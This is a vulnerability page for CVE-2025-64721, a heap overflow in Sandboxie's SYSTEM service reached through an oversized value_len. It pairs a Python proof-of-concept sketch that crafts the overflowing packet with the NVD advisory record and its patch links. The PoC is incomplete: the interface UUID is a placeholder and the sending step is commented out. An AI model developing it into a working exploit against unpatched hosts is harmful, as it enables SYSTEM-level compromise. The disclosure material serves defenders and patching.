CVE-2025-64721

import struct import ctypes # PoC for CVE-2025-64721 - Sandboxie SbieIniServer::RC4Crypt Heap Overflow # This demonstrates triggering the integer overflow via large value_len parameter def trigger_heap_overflow(): """ Trigger heap overflow in SbieIniServer::RC4Crypt by providing oversized value_len The vulnerability exists because: 1. Handler adds fixed header size to caller-controlled value_len 2. No overflow checking is performed 3. Large value_len (e.g., 0xFFFFFFF0) causes allocation size wrap 4. Data copy causes heap overflow """ # Target the SbieIniServer RPC interface # Connection to SbieSvc.exe SYSTEM service # Malicious payload structure # value_len set to trigger integer overflow MALICIOUS_VALUE_LEN = 0xFFFFFFF0 # Causes overflow when + header_size # Craft malicious RC4Crypt request # The RPC interface UUID for SbieIniServer interface_uuid = "..." # Build the exploit packet packet = bytearray() # Header with controlled length packet += b'\x00\x00' # Some header marker # The critical value_len that triggers overflow packet += struct.pack('<I', MALICIOUS_VALUE_LEN) # Little-endian 32-bit # Padding to trigger overflow during copy # This will be written beyond the undersized buffer overflow_data = b'A' * 0x10000 # Large padding packet += overflow_data # Send to SbieSvc.exe via named pipe or RPC # pipe_name = "\\\\.\\pipe\\SbieSvc\\SbieIniServer" print(f"[*] Crafted malicious packet: {len(packet)} bytes") print(f"[*] value_len: 0x{MALICIOUS_VALUE_LEN:08X}") print(f"[*] Expected allocation size (wrapped): {0x10 + MALICIOUS_VALUE_LEN & 0xFFFFFFFF:08X}") print(f"[*] Sending exploit to SbieSvc.exe...") # In real attack, connect to RPC interface and send crafted packet # This would trigger heap overflow allowing code execution as SYSTEM return True if __name__ == "__main__": trigger_heap_overflow()

{"cve": {"id": "CVE-2025-64721", "sourceIdentifier": "[email protected]", "published": "2025-12-11T22:15:55.653", "lastModified": "2025-12-22T18:44:17.920", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Sandboxie is a sandbox-based isolation software for 32-bit and 64-bit Windows NT-based operating systems. In versions 1.16.6 and below, the SYSTEM-level service SbieSvc.exe exposes SbieIniServer::RC4Crypt to sandboxed processes. The handler adds a fixed header size to a caller-controlled value_len without overflow checking. A large value_len (e.g., 0xFFFFFFF0) wraps the allocation size, causing a heap overflow when attacker data is copied into the undersized buffer. This allows sandboxed processes to execute arbitrary code as SYSTEM, fully compromising the host. This issue is fixed in version 1.16.7."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:H/SI:H/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 9.9, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "HIGH", "subIntegrityImpact": "HIGH", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "baseScore": 10.0, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "CHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 6.0}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-190"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:sandboxie-plus:sandboxie:*:*:*:*:plus:*:*:*", "versionStartIncluding": "1.14.0", "versionEndExcluding": "1.16.7", "matchCriteriaId": "4EA496DD-32FD-406F-A660-9CA483B86C06"}]}]}], "references": [{"url": "https://github.com/sandboxie-plus/Sandboxie/commit/000492f8c411d24292f1b977a107994347bc7dfa", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://github.com/sandboxie-plus/Sandboxie/releases/tag/v1.16.7", "source": "[email protected]", "tags": ["Release Notes"]}, {"url": "https://github.com/sandboxie-plus/Sandboxie/security/advisories/GHSA-w476-j57g-96vp", "source": "[email protected]", "tags": ["Exploit", "Vendor Advisory"]}, {"url": "https://github.com/sandboxie-plus/Sandboxie/security/advisories/GHSA-w476-j57g-96vp", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "tags": ["Exploit", "Vendor Advisory"]}]}}